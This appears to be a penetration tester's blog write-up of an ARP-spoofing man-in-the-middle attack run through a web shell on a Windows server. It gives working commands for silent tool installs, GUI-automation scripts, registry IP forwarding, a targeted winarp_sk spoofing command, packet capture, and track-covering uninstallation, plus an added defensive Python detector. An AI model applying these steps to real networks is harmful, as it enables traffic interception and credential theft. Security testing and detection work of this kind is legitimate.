Man in the middle attack through a web shell
Hello all. Let's talk today about the man-in-the-middle (MITM) attack.
No, this isn't a post about what a MITM attack is and how to perform one. The purpose of this blog is to share experience with you, so most of the posts (at least so far) are about things that happened in real environments. On a recent penetration test it was possible to get a web shell through a combination of vulnerabilities. That's good... a web shell, right? But how about going deeper and exploring more of the environment? Yes, if you thought of a reverse shell you are right, but in this case I couldn't establish an outbound connection (that is a subject for another post). I did a lot of things in that environment, and one of them was a MITM attack through the web shell.
Let's go through some important details. First of all, it was a Windows box. There are some tools that can perform a MITM attack on a Windows box, such as Cain & Abel, but remember, we had a web shell and that tool is a GUI tool (forgive me if there is a command line version). There is an old command line tool called winarp_sk which is still available and functional for performing an ARP spoofing attack. This tool seemed great for my case. You can find the source as well as the executable to download, but it requires WinPcap to work (it uses packet.dll). That is the other problem: how to install WinPcap through the command line. To perform a MITM we also need a sniffer; Wireshark (its tshark command line tool) was really good for this. And last but not least: to do all of these things you need a user with high privileges (e.g. Administrator, System). In our case, (un)fortunately, the user running the web server was Local System.
Let's check the anatomy of the attack.
1) Upload winarp_sk.exe
With the web shell it was possible to upload the winarp_sk.exe file. I also checked it on VirusTotal to see how some AV engines reacted to the file. The results can be verified here.
2) Upload Wireshark’s installer
When you install Wireshark interactively it usually asks to install WinPcap as well; however, when you install it in silent mode it doesn't install WinPcap.
You can run Wireshark's installer in silent mode:
wireshark-win32-1.2.7.exe /S /desktopicon=no /quicklaunchicon=no /D=path-to-install
/S: run the installer in silent mode
/desktopicon=no: don't create a desktop icon
/quicklaunchicon=no: don't create a quick launch icon
/D=path-to-install: installation directory (must be the last option)
3) Upload the installer of WinPcap x86.
This was the tricky part. I looked at the documentation and there is no way to install it in silent mode, so we needed some interaction, but we didn't have an interactive session (e.g. via VNC). There were two options: build a program in C that sends the keystrokes for us, or use some program that already does it. The solution: AutoIt. According to its home page, AutoIt is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting. You can use it to automate keystrokes, mouse movement and window/control manipulation. You can write your script and execute it with the AutoIt script runner, or compile it into a standalone executable (no, you don't need any runtime libraries!). Thanks to Brian Desmond, there is a script available on the internet to install WinPcap silently:
; ==========================================================================
; NAME: WinPcap AutoIt Installer
;
; AUTHOR: Brian Desmond, brian@briandesmond.com
; DATE : 11/28/2009
; ==========================================================================
#RequireAdmin ; the installer needs an elevated token
Run("WinPcap_4_1_1.exe")
WinWaitActive("WinPcap 4.1.1 Setup")
Send("!n") ; Alt+N = Next
WinWaitActive("WinPcap 4.1.1 Setup", "Welcome to the WinPcap")
Send("!n")
WinWaitActive("WinPcap 4.1.1 Setup", "License Agreement")
Send("!a") ; Alt+A = I Agree
WinWaitActive("WinPcap 4.1.1 Setup", "Installation options")
ControlClick("WinPcap 4.1.1 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]") ; hack to click the install button
WinWaitActive("WinPcap 4.1.1 Setup", "Completing the WinPcap")
Send("!f") ; Alt+F = Finish
4) Configure Windows to forward packets (alter a registry key)
Activate IP forwarding:
reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v IPEnableRouter /d 1 /t REG_DWORD /f
Deactivate IP forwarding:
reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v IPEnableRouter /d 0 /t REG_DWORD /f
(/v names the value, /t its type, /d the data to write, and /f overwrites an existing value without prompting.)
Note that after this configuration Windows needed to be restarted. There were some things we needed to pay attention to here: a) could we perform a shutdown? Sometimes policies applied on Windows restrict this privilege to specific users. b) if we could perform a shutdown, would the web server restart automatically? We needed to check that. Unfortunately the web server (JBoss) was configured not to start automatically. Then the SC utility came in handy to change the service so that it starts automatically (even though rebooting a server is a very suspicious activity, we needed it).
5) Performing the arpspoof attack
When you call winarp_sk you need to provide one parameter telling it which interface to send the ARP packets from. In our case we didn't have an interactive shell, so to make it work we needed to echo the interface number into it:
echo 1|winarp_sk.exe -m 2 -s 172.31.10.104 -d 172.31.10.2 -c 10
Things to observe: the option -c specifies how many packets you want to send to the target. If you don't provide the number, winarp_sk keeps sending packets until you kill the process. Taskkill was our friend in this case.
6) Capturing packets
Tshark is a command line utility that comes with Wireshark, so it was possible to launch it through our web shell:
tshark -i 1 -c 300 -w 300packets.pcap
After the packets were captured, we downloaded the file and examined its contents.
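Seen from the defending side, the ARP packets sent in step 5 are exactly what stands out in a capture like the one taken in step 6. The following Python script is an added example, not code from the original post or from winarp_sk or Wireshark: it parses a classic libpcap file of Ethernet frames, extracts the ARP packets, and flags the two tell-tale patterns of ARP cache poisoning, an IP address whose announced MAC changes, and a single MAC that announces several IP addresses. It works on any Ethernet pcap, not only ARP-only captures, so it goes slightly beyond the case in the text. The capture it runs on by default is constructed inline: the MAC addresses come from the IANA documentation range 00:00:5e:00:53:xx and the two IP addresses are the ones from the winarp_sk command above; pass the path of a real .pcap written by tshark as the first argument to analyse that instead.

```python
"""Flag ARP cache poisoning in a classic libpcap capture of Ethernet frames."""
import struct
import sys
from collections import defaultdict

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
LINKTYPE_ETHERNET = 1


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def iter_pcap_records(data):
    """Yield (timestamp, frame) for each record; both magic byte orders accepted, pcapng rejected."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled)")
    linktype = struct.unpack_from(endian + "HHiIII", data, 4)[5]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are supported")
    offset = 24  # global header is 24 bytes, each record header 16
    while offset + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack_from(endian + "IIII", data, offset)
        offset += 16
        yield ts_sec + ts_usec / 1e6, data[offset:offset + incl_len]
        offset += incl_len


def parse_arp(frame):
    """Return (oper, sender_mac, sender_ip, target_mac, target_ip), or None for non-ARP frames."""
    if len(frame) < 42 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):  # Ethernet/IPv4 ARP only
        return None
    sha, spa, tha, tpa = struct.unpack_from("!6s4s6s4s", frame, 22)
    return oper, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa)


def detect_arp_poisoning(pcap_bytes):
    """Return alert strings: an IP whose announced MAC changes, and a MAC announcing several IPs."""
    ip_to_mac, mac_to_ips, alerts = {}, defaultdict(set), []
    for ts, frame in iter_pcap_records(pcap_bytes):
        arp = parse_arp(frame)
        if arp is None:
            continue
        oper, sha, spa, _, tpa = arp
        if spa == "0.0.0.0":  # ARP probe: the sender asserts no address yet
            continue
        previous = ip_to_mac.get(spa)
        if previous is not None and previous != sha:
            kind = "reply" if oper == ARP_REPLY else "request"
            alerts.append(f"t={ts:.6f}: {spa} moved from {previous} to {sha} (ARP {kind} to {tpa})")
        ip_to_mac[spa] = sha
        mac_to_ips[sha].add(spa)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts


# --- constructed sample capture (test data, not a real network trace) ---------
def build_arp_frame(oper, sha, spa, tha, tpa, dst_mac=None):
    """Assemble one Ethernet/ARP frame from raw 6-byte MACs and 4-byte IPs."""
    eth = (dst_mac if dst_mac is not None else tha) + sha + struct.pack("!H", ETHERTYPE_ARP)
    return eth + struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper) + sha + spa + tha + tpa


def build_pcap(frames, first_ts=1_000_000):
    """Wrap frames in a little-endian classic pcap container, one second apart."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", first_ts + i, 0, len(frame), len(frame)) + frame
    return out


GATEWAY_MAC = bytes.fromhex("00005e005301")  # IANA documentation MAC range
VICTIM_MAC = bytes.fromhex("00005e005302")
ROGUE_MAC = bytes.fromhex("00005e0053aa")
BROADCAST, ZERO_MAC = b"\xff" * 6, b"\x00" * 6
GATEWAY_IP, VICTIM_IP = bytes([172, 31, 10, 2]), bytes([172, 31, 10, 104])

SAMPLE_PCAP = build_pcap([
    # normal resolution: the host asks for the gateway and the gateway answers
    build_arp_frame(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, GATEWAY_IP, dst_mac=BROADCAST),
    build_arp_frame(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    # poisoning: a third station claims the gateway's IP towards the host ...
    build_arp_frame(ARP_REPLY, ROGUE_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    # ... and the host's IP towards the gateway, so both sides send through it
    build_arp_frame(ARP_REPLY, ROGUE_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for alert in detect_arp_poisoning(data) or ["no ARP anomalies found"]:
        print(alert)
```

Both heuristics have benign triggers (a router answering for secondary addresses, a host that changed its IP after a DHCP renewal), so treat the alerts as a starting point for correlation rather than a verdict. Wireshark's own ARP dissector raises the same condition as the expert info field arp.duplicate-address-detected, which is a quick way to triage a capture before running a script like this over it.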
7) Uninstall Wireshark + WinPcap
Here we used the same logic: AutoIt to drive the uninstallation process.
;==========================================================================
; NAME: Wireshark + WinPcap uninstaller (AutoIT)
;
; AUTHOR: Ismael Gonçalves, http://sharingsec.blogspot.com
; DATE : 11/21/2012
;==========================================================================
Run("C:\Program Files\Wireshark\uninstall.exe")
WinWaitActive("Wireshark 1.2.7 (32-bit) Uninstall")
Send("!n") ; Alt+N = Next
WinWaitActive("Wireshark 1.2.7 (32-bit) Uninstall")
Send("!n")
WinWaitActive("Wireshark 1.2.7 (32-bit) Uninstall")
Send("{DOWN}") ; set the option to uninstall ALL (including WinPcap!)
Send("!u") ; Alt+U = Uninstall
WinWaitActive("Wireshark 1.2.7 (32-bit) Uninstall")
Sleep(10000) ; needed to wait for the uninstallation process
WinWaitActive("WinPcap 4.1.1 Uninstall") ; the Wireshark uninstaller launches the WinPcap one
Send("!u")
WinWaitActive("WinPcap 4.1.1 Uninstall")
Send("!f") ; Alt+F = Finish
WinWaitActive("Wireshark 1.2.7 (32-bit) Uninstall")
Send("!n")
WinWaitActive("Wireshark 1.2.7 (32-bit) Uninstall")
Send("!f")
Conclusion:
winarp_sk.exe, despite its age, is still functional. AutoIt can help to automate tasks in a Windows environment and it proved very handy in our case. You don't need an interactive shell to perform a man-in-the-middle attack.